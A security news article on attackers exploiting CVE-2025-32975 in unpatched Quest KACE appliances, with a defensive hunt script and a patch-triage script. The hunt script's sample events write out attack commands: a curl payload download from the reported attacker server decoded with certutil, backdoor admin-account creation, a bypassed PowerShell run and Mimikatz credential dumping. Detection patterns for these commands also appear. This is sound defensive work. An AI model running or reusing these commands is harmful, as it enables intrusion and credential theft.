Threat actors are suspected of exploiting the maximum-severity vulnerability CVE-2025-32975 (CVSS 10.0) to hijack unpatched Quest KACE Systems Management Appliance (SMA) systems, according to Arctic Wolf. The cybersecurity firm said it observed malicious activity in customer environments starting in the week of 9 March 2026, targeting SMA instances exposed to the internet.
CVE-2025-32975 is an authentication bypass that could let attackers impersonate legitimate users without credentials. Quest released a patch in May 2025, but the latest activity shows that unpatched SMA deployments remain at risk roughly ten months later.
In the observed campaign, threat actors are believed to have seized administrative control and used remote commands to drop Base64-encoded payloads from an external server (216.126.225[.]156) via curl, while also creating additional administrative accounts using runkbot[.]exe and making Windows Registry changes via a PowerShell script.
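The behaviours above (a curl download from the named server followed by decoding of a Base64 payload, account creation under runkbot.exe, the KACE agent's script runner, PowerShell scripts pushed through the agent, and Mimikatz) are all visible in process-creation telemetry on managed endpoints. The hunt below is an added example written for this article, not Arctic Wolf's or Quest's tooling: the events are constructed, the field names (host, parent_image, image, command_line) and the KACE agent install path are assumptions to be mapped onto your own EDR or SIEM schema, and the tier-0 host list is a placeholder.

```python
"""Hunt process-creation events from KACE-managed Windows hosts for the
post-exploitation chain described in the reporting (added example)."""
import re

# Download server named in the reporting (defanged there as 216.126.225[.]156).
IOC_IP = "216.126.225.156"

# Hosts a workstation should not open RDP to (constructed; the reporting names
# backup infrastructure and domain controllers as the targets).
TIER0_HOSTS = {"dc01", "dc02", "backup01"}

# Only the binary name is matched; the install directory is not assumed.
RUNKBOT = "\\runkbot.exe"

DOWNLOAD_AND_DECODE = re.compile(
    r"curl(\.exe)?\s.*(certutil(\.exe)?\s+-decode|base64\s+-d|FromBase64String)", re.I)
ACCOUNT_ADD = re.compile(
    r"\bnet1?(\.exe)?\s+(user|localgroup\s+administrators)\b.*\s/add\b", re.I)
PS_SCRIPT = re.compile(r"powershell(\.exe)?\b.*-f(ile)?\s+\S+\.ps1", re.I)
MIMIKATZ = re.compile(r"(privilege::debug|sekurlsa::|lsadump::)", re.I)
RDP_TARGET = re.compile(r"/v:(?P<target>[\w.-]+)", re.I)


def is_runkbot_child(event: dict) -> bool:
    """True when the process was spawned by the KACE agent's script runner."""
    return event["parent_image"].lower().endswith(RUNKBOT)


def rdp_to_tier0(event: dict) -> bool:
    """mstsc.exe launched against a host in the tier-0 list."""
    if not event["image"].lower().endswith("\\mstsc.exe"):
        return False
    m = RDP_TARGET.search(event["command_line"])
    return bool(m) and m.group("target").split(".")[0].lower() in TIER0_HOSTS


# (rule name, predicate), ordered roughly along the intrusion chain. Plain
# runkbot.exe -> cmd.exe is not flagged on its own: legitimate KACE scripts
# do that constantly, so each rule needs a suspicious command line as well.
RULES = [
    ("ioc_download_server", lambda e: IOC_IP in e["command_line"]),
    ("encoded_payload_drop", lambda e: bool(DOWNLOAD_AND_DECODE.search(e["command_line"]))),
    ("admin_account_added", lambda e: bool(ACCOUNT_ADD.search(e["command_line"]))),
    ("agent_ran_ps_script", lambda e: is_runkbot_child(e) and bool(PS_SCRIPT.search(e["command_line"]))),
    ("mimikatz_cli", lambda e: bool(MIMIKATZ.search(e["command_line"]))),
    ("rdp_to_tier0", rdp_to_tier0),
]


def hunt(events: list[dict]) -> list[dict]:
    """One finding per (event, rule) match. via_kace_agent tells the analyst
    whether the command arrived through the appliance or was typed locally."""
    findings = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                findings.append({"rule": name, "host": e["host"],
                                 "via_kace_agent": is_runkbot_child(e),
                                 "command_line": e["command_line"]})
    return findings


# Constructed sample telemetry, not real events.
KACE = r"C:\Program Files (x86)\Quest\KACE\runkbot.exe"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent_image": KACE, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c curl -s http://216.126.225.156/p.b64 -o p.b64 && certutil -decode p.b64 p.exe"},
    {"host": "ws01", "parent_image": KACE, "image": r"C:\Windows\System32\net.exe",
     "command_line": "net user svc_backup P@ss /add"},
    {"host": "ws01", "parent_image": r"C:\Windows\System32\net.exe", "image": r"C:\Windows\System32\net1.exe",
     "command_line": "net1 localgroup administrators svc_backup /add"},
    {"host": "ws02", "parent_image": KACE, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -ep bypass -f C:\Windows\Temp\r.ps1"},
    {"host": "ws02", "parent_image": r"C:\Windows\Temp\p.exe", "image": r"C:\Windows\Temp\m.exe",
     "command_line": 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "ws03", "parent_image": KACE, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c ipconfig /all"},
    {"host": "ws03", "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mstsc.exe",
     "command_line": "mstsc /v:dc01"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']:5} {f['rule']:22} agent={f['via_kace_agent']!s:5} {f['command_line']}")
```

Run against the constructed events, the benign ipconfig pushed through the agent produces nothing, while the download, both account additions, the agent-pushed script, the Mimikatz invocation and the RDP attempt toward dc01 each produce a finding.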
Other detected actions include credential harvesting with Mimikatz, discovery and enumeration of users and admin accounts, and efforts to gain RDP access to backup infrastructure and domain controllers. Administrators are advised to apply the latest updates and avoid exposing SMA instances to the internet; the vulnerability has been addressed in versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).
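Because the fix lands at a different build on each release branch, a fleet check has to compare within the branch rather than against a single number. The triage script below is an added example written for this article, not Quest's tooling: it encodes only the five fixed builds listed above, refuses to call any other branch safe, and runs over a constructed inventory.

```python
"""Triage KACE SMA appliances against the fixed builds for CVE-2025-32975
(added example; the inventory is constructed)."""
import re

# Lowest fixed build per release branch, from the vendor versions listed above.
FIXED_BUILDS = {(13, 0): 385, (13, 1): 81, (13, 2): 183, (14, 0): 341, (14, 1): 101}

_VERSION = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> tuple[int, int, int]:
    """Accepts '14.0.341' or the '14.0.341 (Patch 5)' style shown above."""
    m = _VERSION.match(text)
    if not m:
        raise ValueError(f"unrecognised SMA version string: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def patch_status(text: str) -> str:
    """'patched', 'vulnerable', or 'unknown-branch' for an x.y branch the fix
    list does not cover (an older branch, or a release newer than the
    reporting). Unknown is deliberately not treated as safe."""
    major, minor, build = parse_version(text)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return "unknown-branch"
    return "patched" if build >= fixed else "vulnerable"


def triage(inventory: list[dict]) -> list[dict]:
    """Order appliances by urgency: not-confirmed-patched and internet-exposed
    first, since those are the targets the reporting describes; within that,
    confirmed-vulnerable ahead of unknown."""
    rank = {"vulnerable": 0, "unknown-branch": 1, "patched": 2}
    rows = []
    for a in inventory:
        status = patch_status(a["version"])
        rows.append({**a, "status": status})
    return sorted(rows, key=lambda r: (r["status"] == "patched",
                                       not r["internet_exposed"],
                                       rank[r["status"]]))


# Constructed inventory (hostnames and versions are illustrative).
INVENTORY = [
    {"name": "sma-prod", "version": "14.0.320", "internet_exposed": True},
    {"name": "sma-lab", "version": "13.2.183", "internet_exposed": False},
    {"name": "sma-dr", "version": "14.1.101 (Patch 4)", "internet_exposed": True},
    {"name": "sma-legacy", "version": "12.1.169", "internet_exposed": True},
]

if __name__ == "__main__":
    for r in triage(INVENTORY):
        exposure = "internet-exposed" if r["internet_exposed"] else "internal"
        print(f"{r['name']:11} {r['version']:20} {r['status']:15} {exposure}")
```

The exposed 14.0 appliance below the fixed build comes out first, the exposed 12.x appliance second because its branch is not on the fix list and must be confirmed with the vendor rather than assumed safe, and the two patched appliances last.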